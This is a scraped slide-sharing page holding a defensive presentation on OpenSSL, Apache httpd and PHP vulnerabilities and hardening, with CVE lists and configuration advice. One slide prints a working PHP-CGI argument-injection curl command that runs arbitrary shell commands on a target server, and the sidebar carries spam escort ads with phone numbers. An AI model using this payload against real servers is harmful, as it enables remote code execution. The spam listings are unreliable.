Q Con New York 2015 Presentation - ConjurQ Con New York 2015 Presentation - Conjur
Q Con New York 2015 Presentation - Conjur
 
Apache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security ConsiderationsApache HttpD Web Server - Hardening and other Security Considerations
Apache HttpD Web Server - Hardening and other Security Considerations
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)security
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year later
 
Software update for embedded systems
Software update for embedded systemsSoftware update for embedded systems
Software update for embedded systems
 
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Project Shipped and Mantl: a deep diveIntroducing Cloud Development with Project Shipped and Mantl: a deep dive
Introducing Cloud Development with Project Shipped and Mantl: a deep dive
 
Introducing Cloud Development with Mantl
Introducing Cloud Development with MantlIntroducing Cloud Development with Mantl
Introducing Cloud Development with Mantl
 
21st Docker Switzerland Meetup - ISTIO
21st Docker Switzerland Meetup - ISTIO21st Docker Switzerland Meetup - ISTIO
21st Docker Switzerland Meetup - ISTIO
 
Learn OpenStack from trystack.cn
Learn OpenStack from trystack.cnLearn OpenStack from trystack.cn
Learn OpenStack from trystack.cn
 
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdfZephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
 
Open stackbrief happylearning
Open stackbrief happylearningOpen stackbrief happylearning
Open stackbrief happylearning
 
Managing the SSL Process
Managing the SSL ProcessManaging the SSL Process
Managing the SSL Process
 
Building world-class security response and secure development processes
Building world-class security response and secure development processesBuilding world-class security response and secure development processes
Building world-class security response and secure development processes
 
POCO C++ Libraries Intro and Overview
POCO C++ Libraries Intro and OverviewPOCO C++ Libraries Intro and Overview
POCO C++ Libraries Intro and Overview
 

Recently uploaded

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 

Recently uploaded (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

Apache web-server-security

  • 1. OpenLogic by Perforce © Perforce Software, Inc. ANDREW L. CARR | SR. ENTERPRISE ARCHITECH
  • 2. openlogic.com2 | OpenLogic by Perforce © Perforce Software, Inc. Confidentiality Statement The information contained in this document is strictly confidential, privileged, and only for the information of the intended recipient. The information contained in this document may not be otherwise used, disclosed, copied, altered, or distributed without the prior written consent of Perforce Software, Inc.
  • 3. openlogic.com3 | OpenLogic by Perforce © Perforce Software, Inc. Overview A U G 1 2 , 2 0 2 0 PHP, Apache and OpenSSL Vulnerabilities Andrew Carr Java Developer / Enterprise Architect Started professionally in 2001
  • 4. openlogic.com4 | OpenLogic by Perforce © Perforce Software, Inc. Agenda P A T H CORE CONCEPTS Review OpenSSL Review Apache Hardening Review PHP Hardening MODIFYING Modifying the configuration. REMOVING Problematic modules and configurations. ADDING Modules that focus on security.
  • 6. openlogic.com6 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL is a robust, commercial-grade, and full- featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols • Provides encryption tools • Allows Apache / Other web servers to encrypt traffic • Provides a lot of other tools
  • 7. openlogic.com7 | OpenLogic by Perforce © Perforce Software, Inc. Encryption in Detail T Y P E S O F E N C R Y P T I O N D E F I N I T I O N S Symmetric Key Public Key Cipher Algorithm used for encryption or decryption Algorithm Procedure the encryption process follows Cryptanalysis Study of ciphers and cryptosystems to find weakness
  • 8. openlogic.com8 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL Between 1998 and 2010 - 0.9.1 – 0.9.8 Current version, released 3.0, releaased 2020 Companies currently run production with 0.9.8-1.1.x, 7-12 years old
  • 9. openlogic.com9 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL - CLI ‘openssl version’ ‘openssl version –a’ ’openssl ciphers –v’ (Cipher list, use ’man cipher’ for more information) ‘openssl speed’ (Benchmark Tool)
  • 10. openlogic.com10 | OpenLogic by Perforce © Perforce Software, Inc. Heartbleed • Bug is in the OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server. • "Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.” • Affects • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable • OpenSSL 1.0.1g is NOT vulnerable • OpenSSL 1.0.0 branch is NOT vulnerable • OpenSSL 0.9.8 branch is NOT vulnerable • Mitigation • 1.0.1g or newer should be used. • -DOPENSSL_NO_HEARTBEATS.
  • 11. openlogic.com11 | OpenLogic by Perforce © Perforce Software, Inc. Heartbleed in the Community Venafi Scan Of Forbes global 2000, more than .5 million hosts are vulnerable. What should they do? Upgrade SSL | Create new keys | Reissue certs
  • 12. openlogic.com12 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL - DOS CVE-2017-3733 What is DOS? Affected versions include 0.9.8 – 1.1.0 (not 1.0.2) Mitigation • Upgrade SSL – 1.1.0e • Use OpenSSL 1.0.2 0.9.8 EOL – Dec 2015 (DO NOT USE)
  • 13. openlogic.com13 | OpenLogic by Perforce © Perforce Software, Inc. • Stay current - https://www.openssl.org/news/ • CVEs - https://cve.mitre.org/cgi- bin/cvekey.cgi?keyword=openssl • OpenUpdate from OpenLogic • Ensure your OpenSSL is up-2-date OpenSSL – How To Avoid Vulnerability
  • 14. openlogic.com14 | OpenLogic by Perforce © Perforce Software, Inc. • DROWN • A serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third-parties being able to read the communication. • HEARTBLEED • M-I-T-M Attack • DOS Vulnerabilities • Other M-I-T-M • Symatec discovers vulnerability that affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n, and 1.0.1o. Users of versions 1.0.2b and 1.0.2c are advised to immediately upgrade to 1.0.2d. Users of versions 1.0.1n and 1.0.1o are advised to immediately upgrade to 1.0.1p. OpenSSL Vulnerabilities
  • 15. openlogic.com15 | OpenLogic by Perforce © Perforce Software, Inc. OpenSSL Installation OpenSSL is preinstalled on a lot of operating systems. Building is simple Get the source Configure Compile Install Reference new SSL when building other products
  • 16. openlogic.com16 | OpenLogic by Perforce © Perforce Software, Inc. • Stay Current • This is limited by other software’s ability to update • Normal network safety hardening • Limit of what you can harden with OpenSSL specifically • OpenSSL is used to support the applications we will harden OpenSSL Hardening
  • 18. openlogic.com18 | OpenLogic by Perforce © Perforce Software, Inc. Apache Web Server A community webserver with prolific implementation Current versions 2.4.29 2.2.34 (FINAL) 2.2 was EOL’d June 2017 with security updates to December 2017 Appx 68 million public instances of Apache Web in use (builtwith.com) More than 70% use vulnerable versions
  • 19. openlogic.com19 | OpenLogic by Perforce © Perforce Software, Inc. Apache Vulnerabilities 0 - D A Y – W H A T I S I T ? 2 . 2 V U L N E R A B I L I T I E S OptionsBleed - CVE-2017-9798 • Ignore the htaccess file Unitialized Memory Reflection – CVE-2017-9788 • Affects 2.2.0 – 2.2.32 (fixed in .34) • Reveals confidential information • Authentication Bypass – CVE- 2017-3167
  • 20. openlogic.com20 | OpenLogic by Perforce © Perforce Software, Inc. CVE Apache 2.2.22 Vulnerability DOS http://www.cvedetails.com/cve/CVE-2014-0098/ http://www.cvedetails.com/cve/CVE-2013-6438/ http://www.cvedetails.com/cve/CVE-2014-0231/ http://www.cvedetails.com/cve/CVE-2013-1896/ XSS http://www.cvedetails.com/cve/CVE-2012-4558/ http://www.cvedetails.com/cve/CVE-2012-3499/ Code-Exec http://www.cvedetails.com/cve/CVE-2013-1862/
  • 21. openlogic.com21 | OpenLogic by Perforce © Perforce Software, Inc. Apache 2.2 Additional Vulnerabilities • important: Uninitialized memory reflection in mod_auth_digest (CVE-2017- 9788) • important: ap_get_basic_auth_pw() Authentication Bypass (CVE-2017- 3167) • important: mod_ssl Null Pointer Dereference (CVE-2017-3169) • important: ap_find_token() Buffer Overread (CVE-2017-7668) • important: mod_mime Buffer Overread (CVE-2017-7679) • important: Apache HTTP Request Parsing Whitespace Defects (CVE-2016- 8743) • n/a: HTTP_PROXY environment variable "httpoxy" mitigation (CVE-2016- 5387) • low: HTTP request smuggling attack against chunked request parser (CVE- 2015-3183) • important: mod_cgid denial of service (CVE-2014-0231) • low: HTTP Trailers processing bypass (CVE-2013-5704) • moderate: mod_deflate denial of service (CVE-2014-0118) • moderate: mod_status buffer overflow (CVE-2014-0226) • low: mod_log_config crash (CVE-2014-0098) • moderate: mod_dav crash (CVE-2013-6438) • low: mod_rewrite log escape filtering (CVE-2013-1862) • moderate: mod_dav crash (CVE-2013-1896) • low: XSS due to unescaped hostnames (CVE-2012-3499) • moderate: XSS in mod_proxy_balancer (CVE-2012-4558) • low: XSS in mod_negotiation when untrusted uploads are supported (CVE- 2012-2687) • Note: This issue is also known as CVE-2008-0455. • low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883) • low: mod_proxy_ajp remote DoS (CVE-2012-4557) • low: mod_setenvif .htaccess privilege escalation (CVE-2011-3607) • low: mod_log_config crash (CVE-2012-0021) • low: scoreboard parent DoS (CVE-2012-0031) • moderate: mod_proxy reverse proxy exposure (CVE-2011-4317) • moderate: error responses can expose cookies (CVE-2012-0053) • low: mod_deflate DoS (CVE-2009-1891) • low: AllowOverride Options handling bypass (CVE-2009-1195) • low: CRLF injection in mod_negotiation when untrusted uploads are supported (CVE-2008-0456) • moderate: APR-util off-by-one overflow (CVE-2009-1956) • moderate: APR-util XML DoS (CVE-2009-1955) • moderate: APR-util heap underwrite (CVE-2009-0023) • important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2791) • low: mod_proxy_ftp globbing XSS (CVE-2008-2939) • low: mod_proxy_balancer CSRF (CVE-2007-6420) • moderate: mod_proxy_http DoS (CVE-2008-2364) • low: mod_proxy_ftp UTF-7 XSS (CVE-2008-0005) • low: mod_proxy_balancer DoS (CVE-2007-6422) • low: mod_proxy_balancer XSS (CVE-2007-6421) • moderate: mod_status XSS (CVE-2007-6388) • moderate: mod_imagemap XSS (CVE-2007-5000) • moderate: mod_proxy crash (CVE-2007-3847) • moderate: mod_status cross-site scripting (CVE-2006-5752) • moderate: Signals to arbitrary processes (CVE-2007-3304) • moderate: mod_cache information leak (CVE-2007-1862) • moderate: mod_cache proxy DoS (CVE-2007-1863) • important: mod_rewrite off-by-one error (CVE-2006-3747) • low: mod_ssl access control DoS (CVE-2005-3357) • moderate: mod_imap Referer Cross-Site Scripting (CVE-2005-3352) • moderate: mod_proxy_ajp remote DoS (CVE-2011-3348) • important: Range header remote DoS (CVE-2011-3192) • Advisory: CVE-2011-3192.txt • moderate: apr_fnmatch flaw leads to mod_autoindex remote DoS (CVE- 2011-0419) • low: expat DoS (CVE-2009-3720) • low: expat DoS (CVE-2009-3560) • low: apr_bridage_split_line DoS (CVE-2010-1623) • important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2068) http://www.apache.org/dist/httpd/patches/apply_to_2.2.15/CVE-2010- 2068-r953616.patch • http://www.apache.org/dist/httpd/patches/apply_to_2.3.5/CVE-2010- 2068-r953418.patch • http://www.apache.org/dist/httpd/binaries/win32/mod_proxy_http-CVE- 2010-2068.zip • low: mod_cache and mod_dav DoS (CVE-2010-1452) • important: mod_isapi module unload flaw (CVE-2010-0425) • low: Subrequest handling of request headers (mod_headers) (CVE-2010- 0434) • moderate: mod_proxy_ajp DoS (CVE-2010-0408) • low: mod_proxy_ftp DoS (CVE-2009-3094) • low: mod_proxy_ftp FTP command injection (CVE-2009-3095) • moderate: Solaris pollset DoS (CVE-2009-2699) • low: APR apr_palloc heap overflow (CVE-2009-2412) • important: mod_proxy reverse proxy DoS (CVE-2009-1890) • important: mod_proxy_ajp information disclosure (CVE-2009-1191)
  • 22. openlogic.com22 | OpenLogic by Perforce © Perforce Software, Inc. Apache - Upgrading UPGRADE TO 2.4 Not that complicated Most setups that run 2.2 will run 2.4 http://httpd.apache.org/docs/2.4/upgrading.html 2.2 configuration Order deny,allow Deny from al TO-> Require all denied 2.2 configuration: Order allow,deny Allow from all TO-> Require all granted
  • 23. openlogic.com23 | OpenLogic by Perforce © Perforce Software, Inc. • CVE-2009-1891 399 • Mod-Deflate allowing DDOS • Latest affected version is 2.2.11, but there are sporadic reports on early 2.4 • CVE-2009-1890 189 • Mod_proxy_httpallowing DDOS via CPU locking • Latest version 2.3.2, some reports on 2.4.0-.1 • CVE-2013-2249 • Mod_session_dbd module allowing arbitrary command execution via HTTP request containing escape chars • Latest affected version 2.4.4 • CVE-2012-0883 • Envvars-std TROJAN HORSE injection • Version 2.4.2 is affected. Critical Apache 2.4 Vulnerabilities
  • 24. openlogic.com24 | OpenLogic by Perforce © Perforce Software, Inc. • What is hardening? • ServerSignature • Turn off • Prevents pages from displaying information about the server • Turn off directory listings • Options • Check for unused modules • Httpd conf • Use groups / users • Httpd conf – user / group Hardening Apache 2
  • 25. openlogic.com25 | OpenLogic by Perforce © Perforce Software, Inc. Hardening Apache 2 (cont.) Use Allow and Deny on directories • <Directory> Deny from all Use Install mod_security • Yum install libapache2-modsecurity Install Use mod_evasiveUse Disable Symlinks • -FollowSymLinks Disable Turn off serverside includes • -Includes Turn off
  • 26. PHP
  • 27. openlogic.com27 | OpenLogic by Perforce © Perforce Software, Inc. PHP 5-7 PHP is in use everywhere PHP 5 has over 500 vulnerabilites (Mitre.org) Upgrade to PHP 7 Lots of information on migration http://php.net/manual/en/migration70.php If you have to use 5, harden it
  • 28. openlogic.com28 | OpenLogic by Perforce © Perforce Software, Inc. • Affected Versions • 7.3 to 7.3.10 • What is It? • Allows an attacker to execute remote code to gain control of system data • How? • Bug #78559 (Heap Buffer Overflow in mb_eregi) • Mitigation • Upgrade to 7.4 • Apply security hardening principals, like least privilege • Exploits • No current exploits known, that does not mean they don’t exist Remote Code Execution Vulnerability
  • 29. openlogic.com29 | OpenLogic by Perforce © Perforce Software, Inc. • Mongo Admin tool • Allows execution of code • Not PHP’s fault • Large negative impact Php 5.5.9 Exploit – Moadmin
  • 30. openlogic.com30 | OpenLogic by Perforce © Perforce Software, Inc. Hardening PHP Prevent fOpen wrappers • Allow_url_fopen Prevent Limit process time / input time • Max_input_time • Max_execution_time Limit Limit script memory • Memory_limit Limit Turn Register Globals off • Register_globals Turn
  • 31. openlogic.com31 | OpenLogic by Perforce © Perforce Software, Inc. Hardening PHP Don’t expose PHP in response • Expose_php Don’t expose Only use redirect • Cgi.force_redirect Use Impose input restrictions • Post_max_size • Max_input_vars Impose Do not display error information • Display_errors=0 • Display_startup_errors Do not display
  • 32. openlogic.com32 | OpenLogic by Perforce © Perforce Software, Inc. Hardening PHP log_errors=1 error_log = <path> Logging Restrict File Access open_basedir = <path> Restrict file_uploads = 0 <or> Upload_max_filesize = 1M File Uploads Session Security Cookie Security Security
  • 33. openlogic.com33 | OpenLogic by Perforce © Perforce Software, Inc. • sudo yum install git gcc gcc-c++ libxml2-devel pkgconfig openssl-devel bzip2-devel curl-devel libpng-devel libjpeg-devel libXpm-devel freetype-devel gmp-devel libmcrypt-devel mariadb-devel aspell-devel recode-devel autoconf bison re2c libicu-devel • (Possibly) yum install bison • sudo mkdir /usr/local/php7 • git clone https://github.com/php/php-src.git • cd php-src • git checkout PHP-7.4.9 • ./buildconf –force • ./configure --prefix=/usr/local/php7 --with-config-file-path=/usr/local/php7/etc --with-config-file-scan-dir=/usr/local/php7/etc/conf.d --enable-bcmath --with-bz2 --with-curl --enable-filter --enable-fpm --with-gd --enable-gd-native-ttf --with-freetype-dir --with-jpeg-dir --with-png-dir --enable-intl -- enable-mbstring --with-mcrypt --enable-mysqlnd --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd -- with-pdo-sqlite --disable-phpdbg --disable-phpdbg-webhelper --enable-opcache --with-openssl --enable-simplexml --with-sqlite3 --enable-xmlreader -- enable-xmlwriter --enable-zip --with-zlib • make && make install Building PHP 7
  • 34. openlogic.com34 | OpenLogic by Perforce © Perforce Software, Inc. Building PHP 7 H O W T O B U I L D • Get the source • Get the dependencies • Grab additional files for anything you want to enable • ./configure –help is your friend • Ask Perforce experts
  • 35. openlogic.com35 | OpenLogic by Perforce © Perforce Software, Inc. A Note About CGI Mode What is it? A mode to serve (interpret) pages without a web server. “Secure” This is supposed to be secure.
  • 36. openlogic.com36 | OpenLogic by Perforce © Perforce Software, Inc. Why CGI Mode is NOT Secure Remote Code Execution You are inviting this sort of attack. Common Exploits There are several common exploits to take advantage of this. curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' --data-binary "<?php system("$2"); die; ?>" "http://$1/cgibin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2d d+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"
  • 37. openlogic.com37 | OpenLogic by Perforce © Perforce Software, Inc. • The web is your friend!!! • Anti-Clickjacking and other practices • https://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/f • Linux Hardening of Apache • https://wiki.debian.org/Apache/Hardening • PHP Hardening • http://www.hardened-php.net/ Hardening
  • 38. Q & A